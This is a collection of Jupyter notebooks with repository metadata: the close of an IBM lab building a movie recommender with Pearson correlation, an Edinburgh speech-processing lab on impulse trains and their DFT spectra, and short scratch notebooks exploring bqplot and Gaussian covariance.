[ [ "#Groupby creates several sub dataframes where they all have the same value in the column specified as the parameter\nuserSubsetGroup = userSubset.groupby(['userId'])", "_____no_output_____" ] ], [ [ "Let's look at one of the users, e.g. the one with userID=1130.\n", "_____no_output_____" ] ], [ [ "userSubsetGroup.get_group(1130)", "_____no_output_____" ] ], [ [ "Let's also sort these groups so the users that share the most movies in common with the input have higher priority. This provides a richer recommendation since we won't go through every single user.\n", "_____no_output_____" ] ], [ [ "#Sorting it so users with movie most in common with the input will have priority\nuserSubsetGroup = sorted(userSubsetGroup, key=lambda x: len(x[1]), reverse=True)", "_____no_output_____" ] ], [ [ "Now let's look at the first user.\n", "_____no_output_____" ] ], [ [ "userSubsetGroup[0:3]", "_____no_output_____" ] ], [ [ "#### Similarity of users to input user\n\nNext, we are going to compare all users (not really all !!!) 
to our specified user and find the one that is most similar.\\\nwe're going to find out how similar each user is to the input through the **Pearson Correlation Coefficient**. It is used to measure the strength of a linear association between two variables. The formula for finding this coefficient between sets X and Y with N values can be seen in the image below.\n\nWhy Pearson Correlation?\n\nPearson correlation is invariant to scaling, i.e. multiplying all elements by a nonzero constant or adding any constant to all elements. For example, if you have two vectors X and Y,then, pearson(X, Y) == pearson(X, 2 \\* Y + 3). This is a pretty important property in recommendation systems because for example two users might rate two series of items totally different in terms of absolute rates, but they would be similar users (i.e. with similar ideas) with similar rates in various scales .\n\n![alt text](https://wikimedia.org/api/rest_v1/media/math/render/svg/bd1ccc2979b0fd1c1aec96e386f686ae874f9ec0 \"Pearson Correlation\")\n\nThe values given by the formula vary from r = -1 to r = 1, where 1 forms a direct correlation between the two entities (it means a perfect positive correlation) and -1 forms a perfect negative correlation.\n\nIn our case, a 1 means that the two users have similar tastes while a -1 means the opposite.\n", "_____no_output_____" ], [ "We will select a subset of users to iterate through. 
This limit is imposed because we don't want to waste too much time going through every single user.\n", "_____no_output_____" ] ], [ [ "userSubsetGroup = userSubsetGroup[0:100]", "_____no_output_____" ] ], [ [ "Now, we calculate the Pearson Correlation between input user and subset group, and store it in a dictionary, where the key is the user Id and the value is the coefficient.\n", "_____no_output_____" ] ], [ [ "#Store the Pearson Correlation in a dictionary, where the key is the user Id and the value is the coefficient\npearsonCorrelationDict = {}\n\n#For every user group in our subset\nfor name, group in userSubsetGroup:\n #Let's start by sorting the input and current user group so the values aren't mixed up later on\n group = group.sort_values(by='movieId')\n inputMovies = inputMovies.sort_values(by='movieId')\n #Get the N for the formula\n nRatings = len(group)\n #Get the review scores for the movies that they both have in common\n temp_df = inputMovies[inputMovies['movieId'].isin(group['movieId'].tolist())]\n #And then store them in a temporary buffer variable in a list format to facilitate future calculations\n tempRatingList = temp_df['rating'].tolist()\n #Let's also put the current user group reviews in a list format\n tempGroupList = group['rating'].tolist()\n #Now let's calculate the pearson correlation between two users, so called, x and y\n Sxx = sum([i**2 for i in tempRatingList]) - pow(sum(tempRatingList),2)/float(nRatings)\n Syy = sum([i**2 for i in tempGroupList]) - pow(sum(tempGroupList),2)/float(nRatings)\n Sxy = sum( i*j for i, j in zip(tempRatingList, tempGroupList)) - sum(tempRatingList)*sum(tempGroupList)/float(nRatings)\n \n #If the denominator is different than zero, then divide, else, 0 correlation.\n if Sxx != 0 and Syy != 0:\n pearsonCorrelationDict[name] = Sxy/sqrt(Sxx*Syy)\n else:\n pearsonCorrelationDict[name] = 0\n", "_____no_output_____" ], [ "pearsonCorrelationDict.items()", "_____no_output_____" ], [ "pearsonDF = 
pd.DataFrame.from_dict(pearsonCorrelationDict, orient='index')\npearsonDF.columns = ['similarityIndex']\npearsonDF['userId'] = pearsonDF.index\npearsonDF.index = range(len(pearsonDF))\npearsonDF.head()", "_____no_output_____" ] ], [ [ "#### The top x similar users to input user\n\nNow let's get the top 50 users that are most similar to the input.\n", "_____no_output_____" ] ], [ [ "topUsers=pearsonDF.sort_values(by='similarityIndex', ascending=False)[0:50]\ntopUsers.head()", "_____no_output_____" ] ], [ [ "Now, let's start recommending movies to the input user.\n\n#### Rating of selected users to all movies\n\nWe're going to do this by taking the weighted average of the ratings of the movies using the Pearson Correlation as the weight. But to do this, we first need to get the movies watched by the users in our **pearsonDF** from the ratings dataframe and then store their correlation in a new column called \\_similarityIndex\". This is achieved below by merging of these two tables.\n", "_____no_output_____" ] ], [ [ "topUsersRating=topUsers.merge(ratings_df, left_on='userId', right_on='userId', how='inner')\ntopUsersRating.head()", "_____no_output_____" ] ], [ [ "Now all we need to do is simply multiply the movie rating by its weight (The similarity index), then sum up the new ratings and divide it by the sum of the weights.\n\nWe can easily do this by simply multiplying two columns, then grouping up the dataframe by movieId and then dividing two columns:\n\nIt shows the idea of all similar users to candidate movies for the input user:\n", "_____no_output_____" ] ], [ [ "#Multiplies the similarity by the user's ratings\ntopUsersRating['weightedRating'] = topUsersRating['similarityIndex']*topUsersRating['rating']\ntopUsersRating.head()", "_____no_output_____" ], [ "#Applies a sum to the topUsers after grouping it up by userId\ntempTopUsersRating = topUsersRating.groupby('movieId').sum()[['similarityIndex','weightedRating']]\ntempTopUsersRating.columns = 
['sum_similarityIndex','sum_weightedRating']\ntempTopUsersRating.head()", "_____no_output_____" ], [ "#Creates an empty dataframe\nrecommendation_df = pd.DataFrame()\n#Now we take the weighted average\nrecommendation_df['weighted average recommendation score'] = tempTopUsersRating['sum_weightedRating']/tempTopUsersRating['sum_similarityIndex']\nrecommendation_df['movieId'] = tempTopUsersRating.index\nrecommendation_df.head()", "_____no_output_____" ] ], [ [ "Now let's sort it and see the top 20 movies that the algorithm recommended!\n", "_____no_output_____" ] ], [ [ "recommendation_df = recommendation_df.sort_values(by='weighted average recommendation score', ascending=False)\nrecommendation_df.head(10)", "_____no_output_____" ], [ "movies_df.loc[movies_df['movieId'].isin(recommendation_df.head(10)['movieId'].tolist())]", "_____no_output_____" ] ], [ [ "### Advantages and Disadvantages of Collaborative Filtering\n\n##### Advantages\n\n* Takes other user's ratings into consideration\n* Doesn't need to study or extract information from the recommended item\n* Adapts to the user's interests which might change over time\n\n##### Disadvantages\n\n* Approximation function can be slow\n* There might be a low of amount of users to approximate\n* Privacy issues when trying to learn the user's preferences\n", "_____no_output_____" ], [ "<h2>Want to learn more?</h2>\n\nIBM SPSS Modeler is a comprehensive analytics platform that has many machine learning algorithms. It has been designed to bring predictive intelligence to decisions made by individuals, by groups, by systems – by your enterprise as a whole. 
A free trial is available through this course, available here: <a href=\"https://www.ibm.com/analytics/spss-statistics-software?utm_medium=Exinfluencer&utm_source=Exinfluencer&utm_content=000026UJ&utm_term=10006555&utm_id=NA-SkillsNetwork-Channel-SkillsNetworkCoursesIBMDeveloperSkillsNetworkML0101ENSkillsNetwork20718538-2021-01-01\">SPSS Modeler</a>\n\nAlso, you can use Watson Studio to run these notebooks faster with bigger datasets. Watson Studio is IBM's leading cloud solution for data scientists, built by data scientists. With Jupyter notebooks, RStudio, Apache Spark and popular libraries pre-packaged in the cloud, Watson Studio enables data scientists to collaborate on their projects without having to install anything. Join the fast-growing community of Watson Studio users today with a free account at <a href=\"https://www.ibm.com/cloud/watson-studio?utm_medium=Exinfluencer&utm_source=Exinfluencer&utm_content=000026UJ&utm_term=10006555&utm_id=NA-SkillsNetwork-Channel-SkillsNetworkCoursesIBMDeveloperSkillsNetworkML0101ENSkillsNetwork20718538-2021-01-01\">Watson Studio</a>\n", "_____no_output_____" ], [ "### Thank you for completing this lab!\n\n## Author\n\nSaeed Aghabozorgi\n\n### Other Contributors\n\n<a href=\"https://www.linkedin.com/in/joseph-s-50398b136/?utm_medium=Exinfluencer&utm_source=Exinfluencer&utm_content=000026UJ&utm_term=10006555&utm_id=NA-SkillsNetwork-Channel-SkillsNetworkCoursesIBMDeveloperSkillsNetworkML0101ENSkillsNetwork20718538-2021-01-01\" target=\"_blank\">Joseph Santarcangelo</a>\n\n## Change Log\n\n| Date (YYYY-MM-DD) | Version | Changed By | Change Description |\n| ----------------- | ------- | ---------- | ---------------------------------- |\n| 2020-11-03 | 2.1 | Lakshmi | Updated URL of csv |\n| 2020-08-27 | 2.0 | Lavanya | Moved lab to course repo in GitLab |\n| | | | |\n| | | | |\n\n## <h3 align=\"center\"> © IBM Corporation 2020. All rights reserved. <h3/>\n", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ] ]
e72fb842d59908680d402a919fa294f9398670e7
15,101
ipynb
Jupyter Notebook
signals/signals-lab-2/signals-2-1-impulse-as-source.ipynb
laic/uoe_speech_processing_course
7cbc0424e87a8a98fd92fb664c9c156c83323f78
[ "MIT" ]
19
2020-09-20T17:01:53.000Z
2021-12-15T18:24:06.000Z
signals/signals-lab-2/signals-2-1-impulse-as-source.ipynb
laic/uoe_speech_processing_course
7cbc0424e87a8a98fd92fb664c9c156c83323f78
[ "MIT" ]
null
null
null
signals/signals-lab-2/signals-2-1-impulse-as-source.ipynb
laic/uoe_speech_processing_course
7cbc0424e87a8a98fd92fb664c9c156c83323f78
[ "MIT" ]
10
2020-09-25T08:09:50.000Z
2021-09-14T03:28:01.000Z
34.088036
351
0.598305
[ [ [ "#### _Speech Processing Labs 2021: SIGNALS 2: Building the Source_", "_____no_output_____" ] ], [ [ "## Run this first!\n%matplotlib inline\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport cmath\nfrom math import floor\nfrom matplotlib.animation import FuncAnimation\nfrom IPython.display import HTML\nplt.style.use('ggplot')\n\nfrom dspMisc import * ", "_____no_output_____" ] ], [ [ "# Building the Source\n\n### Learning Outcomes\n* Be able to describe what an impulse train is\n* Be able to explain why an impulse train is used to model the voice source\n* Be able to describe the frequency response of single impulse and and impulse train\n\n\n### Need to Know\n* Topic Videos: Harmonics, Impulse Train, Frequency Domain\n* [Interpreting the Discrete Fourier Transform](../signals-lab-1/signals-1-1-interpreting-the-discrete-fourier-transform.ipynb)\n\n\n\n", "_____no_output_____" ], [ "## 1 A Single Impulse Response\n\nThe previous notebooks looked at [the DFT and how to interpret it's outputs](../signals-lab-1/signals-1-1-interpreting-the-discrete-fourier-transform.ipynb). With an understanding of that, we can start thinking about how this ability to go from the time domain to the frequency domain (and back again) can help us build up a model of speech. \n\nLet's start simple: What happens when the input is just a single **impulse**? What can this tell us? \n\nThe following code cells generate a single impulse in an input sequence of length `N=64`, given a specific sampling rate `f_s`. As we saw previously, the DFT frequency resolution is completely determined by these two parameters. 
\n", "_____no_output_____" ] ], [ [ "## Set the number of samples N, sampling rate f_s\n## As usual all our interpretation of the DFT outputs will depend on the values of these parameters\n\nN=64\n\n#sampling rate: \nf_s = 64\n\n## sample time\nt_s = 1/f_s\n\n## Check our parameters\nprint(\"Number of samples: N = %d\" % N)\nprint(\"sampling rate: f_s = %f\\nsampling time: t_s: %f\" % (f_s, t_s))\n\n", "_____no_output_____" ], [ "## indices of input sequence of size N\nnsteps = np.array(range(N))\n\n## the sequence of time steps given the sampling rate \ntime_steps = t_s * nsteps\n\n## Now let's create an impulse response\n# First, we create a sequence of length N but all zeros\nx_impulse = np.zeros(N)\n\n# And then set a single element to be 1, i.e. a single impulse\nx_impulse[1]=1\n\n## Now, we plot it:\nfig, timedom = plt.subplots(figsize=(16, 4))\ntimedom.scatter(time_steps, x_impulse, color='magenta')\ntimedom.plot(time_steps, x_impulse, color='magenta')\n\ntimedom.set_ylabel(\"Amplitude\")\ntimedom.set_xlabel(\"Time (s)\")\ntimedom.set_title(\"A single impulse as input\")\n\n", "_____no_output_____" ] ], [ [ "The plot above shows an time vs amplitude graph of input $x[n]$, where all but 1 of the $N=64$ input points are zero, and $x[1]=1$. 
\n\nNow let's look at the DFT of this single impulse.", "_____no_output_____" ] ], [ [ "## Now let's look at the DFT outputs of the impulse: \nmag_impulse, phase_impulse = get_dft_mag_phase(x_impulse, N)\n\n## Note: in this case N=f_s so the DFT output frequencies are the same as the DFT output indices\n## We'll look at cases where this differs later\ndft_freqs = get_dft_freqs_all(f_s, N)\n\n## plot the magnitudes, but this time we're going to need to zoom in a bit on the y-axis: \nfig, fdom = plt.subplots(figsize=(16, 4))\nfdom.set(ylim=(-1, 4))\nfdom.plot([0,np.max(dft_freqs)], [0,0], color='grey')\nfdom.scatter(dft_freqs, mag_impulse)\nfdom.set_xlabel(\"Frequency (Hz)\")\nfdom.set_ylabel(\"Magnitude\")\n\n## Plot the phases\nfig, fdom = plt.subplots(figsize=(16, 4))\nfdom.plot([0,np.max(dft_freqs)], [0,0], color='grey')\nfdom.scatter(dft_freqs, phase_impulse)\nfdom.set_xlabel(\"Frequency (Hz)\")\nfdom.set_ylabel(\"Phase angle (radians)\")\n\n## You should see that magnitudes for all the bins is one (you might need to change the y axis limit)", "_____no_output_____" ] ], [ [ "### Exercise: \n**Question**\n\n* What does the magnitude spectrum show? \n* What does the phase spectrum show? \n* How might this be useful for modelling the vocal source? \n", "_____no_output_____" ], [ "### Notes", "_____no_output_____" ], [ "## 2 From Impulse to Impulse Train\n\nThe DFT analysis above showed us that a single impulse can potentially be linked to any frequency! \nThis might not seem very useful at first, but actually we can use this to start making a model of the voice source that we can shape in the way we want. The first thing is to add a **periodic** element. To do this we'll make an **impulse train**: a sequence `x` with value 1 every `n_period` samples, and zero otherwise. \n\nWe should note though that not all speech sounds are periodic. For example, fricatives like /s/ and /sh/ are more like white noise. We'll have to model these in other ways. 
\n\nNow let's make an impulse train with `N=64` samples, a sampling rate of `f_s=64` samples per second, and an impulse period `n_period=4`:", "_____no_output_____" ] ], [ [ "## Let's keep the number of samples and the sampling rate the same as above\nN=64\nf_s = 64\nt_s = 1/f_s\nnsteps = np.array(range(N))\ntime_steps = t_s * nsteps\n\n## Now let's create an impulse response:\n\n# create a sequence of length N but all zeros\nx_impulse_train = np.zeros(N)\n\n# set the impulse period to be 1 impulse every n_period samples\nn_period = 4\n\n# Find the indices which will carry the impulses, i.e. every n_period-th one starting from 0 to N\nimpulse_indices = np.arange(0, N, n_period)\n\n## Set the impulses\nx_impulse_train[impulse_indices] = 1\n\n## Plot it!\nfig, timedom = plt.subplots(figsize=(16, 4))\ntimedom.scatter(time_steps, x_impulse_train, color='magenta')\ntimedom.plot(time_steps, x_impulse_train, color='magenta')\ntimedom.set_ylabel(\"Amplitude\")\ntimedom.set_xlabel(\"Time (s)\")\ntimedom.set_title(\"An impulse train: an impulse every %d samples\" % n_period)", "_____no_output_____" ] ], [ [ "You should see a repeated sequence over 1 second where every 4th sample has amplitude 1, and all the rest have value 0. 
\n\n### DFT of an impulse train\n\nNow let's look at the DFT of this impulse train.", "_____no_output_____" ] ], [ [ "## Get the DFT outputs: magnitude and phase\nmag_impulse_train, phase_impulse_train = get_dft_mag_phase(x_impulse_train, N)\n\n## Get the DFT output frequencies, for plotting\ndft_freqs = get_dft_freqs_all(f_s, N)\n\n## plot the magnitudes, but this time we're going to need to zoom in a bit on the y-axis: \nfig, fdom = plt.subplots(figsize=(16, 4))\nfdom.set(ylim=(-1, N), xlim=(-1, N/2))\nfdom.scatter(dft_freqs, mag_impulse_train)\nfdom.set_xlabel(\"Frequency (Hz)\")\nfdom.set_ylabel(\"Magnitude\")\nfdom.set_title(\"Impulse Train Magnitude Response (First N/2 DFT outputs)\")\n\n## Plot the phases\nfig, fdom = plt.subplots(figsize=(16, 4))\nfdom.set(ylim=(-4,4), xlim=(-1, N/2))\nfdom.scatter(dft_freqs, phase_impulse_train)\nfdom.set_xlabel(\"Frequency (Hz)\")\nfdom.set_ylabel(\"Phase (radians)\")\nfdom.set_title(\"Impulse Train Phase Response (First N/2 DFT outputs)\")\n", "_____no_output_____" ] ], [ [ "The magnitude (top) plot indicates that the impulse train has frequency components at multiples of 8 Hz.\nThe phase plot (bottom) doesn't show a phase shift. This also makes sense since our input sequence started with a 1, so acts like cosine with no phase shift. \n\n**Note** We only plotted the first $N/2$ DFT outputs since we saw previously that DFT outputs are symmetrical around $N/2$. \n", "_____no_output_____" ], [ "### Exercise \n\n* What the relationship between the non-zero magnitudes in the example above? \n * What's the fundamental frequency of the impulse train? \n* What DFT output frequencies have non-zero magnitudes if you you change `n_period` to `8`? \n* What happens when the frequency doesn't exactly match one of the DFT outputs? \n * e.g. 
try `n_period = 5`", "_____no_output_____" ], [ "### Notes", "_____no_output_____" ], [ "## 3 Impulse train fundamental frequency\n\nSince we eventually want to model the vocal source, we want to be able to create impulse trains with specific fundamental frequencies ($F_0$). As usual for digital signal processing, the actual sequence we generate to represent this will depend on the sample rate. \n\nThe following cell defines a function to create impulse trains varying the sample rate, desired frequency, and number of samples. We'll use this later to see how this interacts with different types of filters. \n", "_____no_output_____" ] ], [ [ "def make_impulse_train(sample_rate, frequency, n_samples): \n # make an arrange of n_samples, all zeros to start\n x = np.zeros(n_samples)\n \n # Determine where the impulses go based on the sample rate\n # The time between samples: sample_time = 1/sample_rate\n \n #A frequency of f cycles/second means the wavelength=1/f\n # So samples_per_cycle = wavelength/t_s = 1/frequency / 1/sample_rate = sample_rate/frequency\n \n ## We need to round to the nearest integer\n samples_per_cycle = round(sample_rate/frequency)\n \n # Set indices for impulses\n impulse_positions = np.arange(0, n_samples, samples_per_cycle)\n #print(\"impulse_positions:\", impulse_positions)\n # set the impulses\n x[impulse_positions] = 1\n \n ## return the time steps associated with the impulse train samples\n nsteps = np.array(range(n_samples))\n time_steps = (1/sample_rate) * nsteps \n \n return x, time_steps", "_____no_output_____" ], [ "## Set the number of samples and sampling rate\nN = 64\nf_s = 64\n\n## set our desired impulse train frequency\nfreq = 12\n\nx_impulse_train, time_steps = make_impulse_train(sample_rate=f_s, frequency=freq, n_samples=N)\n\nfig, timedom = plt.subplots(figsize=(16, 4))\ntimedom.scatter(time_steps, x_impulse_train, color='magenta')\ntimedom.plot(time_steps, x_impulse_train, color='magenta')\n\n", "_____no_output_____" ] ], [ [ 
"### Exercise\n\nTry changing the frequency of the impulse train. \n* What's the highest frequency you can actually generate if the sample rate equals 64? \n", "_____no_output_____" ], [ "### Notes", "_____no_output_____" ], [ "### Next: Filters\n\nNow that we've made a (sort of) source, we want to create a filter that can alter input (impulse train) so that the output looks the way we want it it. In class you've seen two types of filters: \n\n* [Finite Impluse Response (FIR) filters](./signals-2-2-fir-filters.ipynb)\n* [Infinite Impluse Response (IIR) filters](./signals-2-3-iir-filters.ipynb)\n\nBoth perform a transform on an input sequence $x[n]$ to give us some desired output sequence $y[n]$. The difference between the two types of filters is basically whether we only use the inputs to derive each output $y[n]$ (FIR), or whether we also use previous outputs (IIR). \n\nThe next notebook illustrates some of the properties of [FIR filters](./signals-2-2-fir-filters.ipynb). ", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ] ]
e72fc8544bcb967246d4150b6db0f1b75f765db6
1,940
ipynb
Jupyter Notebook
_site/week06/Untitled.ipynb
UIUC-iSchool-DataViz/spring2019online
e586cfafd90d6de38c308bf8ad072c9a4ed8485b
[ "BSD-3-Clause" ]
1
2019-08-11T04:03:24.000Z
2019-08-11T04:03:24.000Z
_site/week06/Untitled.ipynb
UIUC-iSchool-DataViz/spring2019online
e586cfafd90d6de38c308bf8ad072c9a4ed8485b
[ "BSD-3-Clause" ]
1
2020-03-02T00:11:33.000Z
2020-03-02T00:11:33.000Z
_site/week06/Untitled.ipynb
UIUC-iSchool-DataViz/spring2019online
e586cfafd90d6de38c308bf8ad072c9a4ed8485b
[ "BSD-3-Clause" ]
1
2020-03-09T16:13:34.000Z
2020-03-09T16:13:34.000Z
18.47619
163
0.518557
[ [ [ "import bqplot", "_____no_output_____" ], [ "import bqplot.pyplot as plt", "_____no_output_____" ], [ "plt.plot([5,5,6],[1,2,3])\nplt.show()", "_____no_output_____" ], [ "import numpy as np", "_____no_output_____" ], [ "np.random.randint(0,10,5)", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code" ] ]
e72fd26af6bfcd1120f701e2356862b70af119dc
312,983
ipynb
Jupyter Notebook
gaussian_playing.ipynb
muatik/machine-learning-examples
41f24cb168a7be1a77cf369cc508849552c8072b
[ "MIT" ]
17
2017-09-18T11:24:39.000Z
2021-02-21T11:09:13.000Z
gaussian_playing.ipynb
muatik/dm
41f24cb168a7be1a77cf369cc508849552c8072b
[ "MIT" ]
null
null
null
gaussian_playing.ipynb
muatik/dm
41f24cb168a7be1a77cf369cc508849552c8072b
[ "MIT" ]
11
2017-08-01T14:04:24.000Z
2022-02-13T10:50:52.000Z
463.678519
94,998
0.930619
[ [ [ "import numpy as np\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport seaborn as sns\nsns.set(color_codes=True)\n\n%matplotlib inline", "_____no_output_____" ], [ "data1 = np.random.normal(20, 7, size=150)\ndata2 = np.random.normal(40, 10, size=150)\nsns.jointplot(x=data1, y=data2,kind=\"kde\");", "_____no_output_____" ], [ "data1 = np.random.normal(20, 6, size=20)\ndata1 = np.sort(data1)\ndata2 = np.sort(data1) + 9.9\n\n# data1 = np.linspace(-5, 5, 40)\n# print(data1)\n# data1 = np.sort(np.random.normal(20, 3, size=240))\n# print(data1)\n# data2 = data1\ndef dd(data1, data2):\n from matplotlib import pylab\n x = np.linspace(-5, 5, 200)\n y = x\n X, Y = np.meshgrid(x, y)\n \n# X, Y = np.meshgrid(data1, data2)\n Z = pylab.bivariate_normal(X, Y)\n print(X)\n \n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.plot_surface(X, Y, Z, cmap= \"OrRd\")\ndd(bins1, bins1)", "[[-5. -4.94974874 -4.89949749 ..., 4.89949749 4.94974874 5. ]\n [-5. -4.94974874 -4.89949749 ..., 4.89949749 4.94974874 5. ]\n [-5. -4.94974874 -4.89949749 ..., 4.89949749 4.94974874 5. ]\n ..., \n [-5. -4.94974874 -4.89949749 ..., 4.89949749 4.94974874 5. ]\n [-5. -4.94974874 -4.89949749 ..., 4.89949749 4.94974874 5. ]\n [-5. -4.94974874 -4.89949749 ..., 4.89949749 4.94974874 5. 
]]\n" ], [ "# data = [4, 1, 4,5, 6, 4, 5, 2, 4, 5, 4, 4, 3, 3, 6,3,3,3, 4, 5, 3, 6, 4, 3, 4, 2, 5, 0,4, 3, 4, 5, 5, 3, 4, 5, 4, 3, 5, 6, 3, 4, 5, 5, 8, 7, 3, 5, 6, 4, 5]\ndef pre_calc(data):\n mean = np.sum(data) / len(data)\n variance = np.sum(np.power(np.subtract(data, mean), 2)) / len(data)\n sigma = np.sqrt(variance)\n# print(\"mean: \", mean, np.mean(data))\n# print(\"variance: \", variance, np.var(data))\n# print(\"standard deviation: \", sigma, np.std(data))\n return mean, variance, sigma\n\ndef cov(data1, data2):\n mean1, variance1, sigma1 = pre_calc(data1)\n mean2, variance2, sigma2 = pre_calc(data2)\n return np.sum((data1-mean1) * (data2-mean2)) / len(data1)\n\nprint(cov(data1, data2))\nnp.cov(data1, data2)", "15.6858339625\n" ], [ "def plot_raw_data(data, mean, sigma):\n mean, variance, sigma = pre_calc(data)\n # plotting data\n plt.ylim(-30, 70)\n plt.scatter(x=range(len(data1)), y=data)\n\n # plotting mean\n plt.plot(range(len(data)), [mean] * len(data), \"r-\")\n\n # plotting standard deviation\n plt.plot(range(len(data)), [sigma + mean] * len(data), \"g-\")\n plt.plot(range(len(data)), [mean - sigma] * len(data), \"g-\")", "_____no_output_____" ], [ "mean1, variance1, sigma1 = pre_calc(data1)\nmean2, variance2, sigma2 = pre_calc(data2)\n\nplt.figure(figsize=(12,4))\nplt.subplot(121)\nplot_raw_data(data1, mean1, sigma1)\nplt.subplot(122)\nplot_raw_data(data2, mean2, sigma2)", "_____no_output_____" ], [ "def plot_hist(data, mean, sigma):\n count, bins, ignored = plt.hist(data, len(data)//5, normed=True)\n plt.plot(\n bins, \n 1/(sigma*np.sqrt(2 * np.pi)) * np.exp(-(bins-mean)**2 / (2*sigma**2)), \n linewidth=2,color=\"r\")\n\nplt.figure(figsize=(12,4))\nplt.subplot(121)\nplot_hist(data1, mean1, sigma1)\nplt.subplot(122)\nplot_hist(data2, mean2, sigma2)", "_____no_output_____" ], [ "mu, sigma = 10, 15.0 # mean and standard deviation\ndata = np.random.normal(mu, sigma, 1000)", "_____no_output_____" ], [ "count, bins, ignored = plt.hist(data, 50, 
normed=True)\nplt.plot(\n bins, \n 1/(sigma*np.sqrt(2 * np.pi)) * np.exp(-(bins-mu)**2 / (2*sigma**2)), \n linewidth=2,color=\"r\")", "_____no_output_____" ], [ "count1, bins1, ignored2 = plt.hist(data1, len(data1)//5, normed=True)\ncount1, bins2, ignored2 = plt.hist(data2, len(data2)//5, normed=True)", "_____no_output_____" ], [ "x = np.mat([7.0, 8]).T\nm = np.mat([5, 5.0]).T\ns = np.mat(np.diag((1,1.0)))\nprint(x)\nprint(m)\nprint(s)", "[[ 7.]\n [ 8.]]\n[[ 5.]\n [ 5.]]\n[[ 1. 0.]\n [ 0. 1.]]\n" ], [ "(x - m).T ", "_____no_output_____" ], [ "s.I", "_____no_output_____" ], [ "(x - m).T * s.I", "_____no_output_____" ], [ "(x - m).T * s.I * (x - m)", "_____no_output_____" ], [ "s = np.mat(np.diag((1,1.0)))\ns[0] = [1.0, 1]\ns[1] = [0, 1.0]\n\nprint(s.I)\nprint(np.exp((x - m).T * s.I * (x - m)))", "[[ 1. -1.]\n [ 0. 1.]]\n[[ 1096.63315843]]\n" ], [ "# x1 = np.array([1.0, 2, 2, 3, 3, 3, 3, 4, 5, 4, 4, 4, 4, 4, 4, 4, 5, 5, 5, 8, 13, 14, 5, 16])\n# x2 = np.array([1.0, 1, 2, 2, 3, 3, 2, 3, 2, 5, 4, 7, 4, 4, 4, 4, 5, 5, 5, 9, 11, 12, 5, 15])\nxa = np.array([1.0, 2, 2, 3, 3, 3, 4,4,4,4,5,5,5,6,6,17, 9, 6, 7, 3])\nxb = np.array([1.0, 2, 2.1, 3, 5.2, 3, 4,4,4,4,5,5,7,8,9,18, 9, 6, 7, 3]) \nprint(x1)\nsigma = np.cov(xa, xb)\nprint(sigma)\nsns.jointplot(x=xa, y=xb, kind=\"kde\")\nsns.jointplot(x=xa, y=xb, kind=\"reg\")", "[ 1. 2. 2. 3. 3. 3. 4. 4. 4. 4. 5. 5. 5. 6. 6.\n 17.]\n[[ 11.62894737 12.30342105]\n [ 12.30342105 13.90134211]]\n" ], [ "m_a = np.mean(xa)\nm_b = np.mean(xb)\nprint(m_a, m_b)", "4.95 5.465\n" ], [ "x_b = 10\nm2_a = m_a + sigma[0][1] * np.mat(sigma[1][1]).I * (x_b - m_b)\nsigma2_a = sigma[0][0] - sigma[0][1] * np.mat(sigma[1][1]).I * sigma[1][0]\nprint(m2_a, sigma2_a)", "[[ 8.96371422]] [[ 0.73977074]]\n" ], [ "variance_a = np.power(sigma2_a, 2)\n1/np.sqrt(2*np.pi * variance_a ) * np.exp(-1.0/2*variance_a )", "_____no_output_____" ], [ "1/np.sqrt(2 * np.pi * sigma2_a) * np.exp(-1.0/2 * )", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
e72fdc8cc544e44aec53e5036d9d75dc52cca8d1
736,940
ipynb
Jupyter Notebook
tutorials/Bayes/TA_solutions/BayesDay_Tutorial_4_solutions.ipynb
sanchobarriga/course-content
a7cbe0fa40dee200bd964b349e685513bb9f71c4
[ "CC-BY-4.0" ]
1
2020-06-13T20:03:27.000Z
2020-06-13T20:03:27.000Z
tutorials/Bayes/TA_solutions/BayesDay_Tutorial_4_solutions.ipynb
sanchobarriga/course-content
a7cbe0fa40dee200bd964b349e685513bb9f71c4
[ "CC-BY-4.0" ]
1
2020-06-22T22:57:03.000Z
2020-06-22T22:57:03.000Z
tutorials/Bayes/TA_solutions/BayesDay_Tutorial_4_solutions.ipynb
sanchobarriga/course-content
a7cbe0fa40dee200bd964b349e685513bb9f71c4
[ "CC-BY-4.0" ]
1
2021-08-06T08:05:01.000Z
2021-08-06T08:05:01.000Z
668.729583
309,928
0.944564
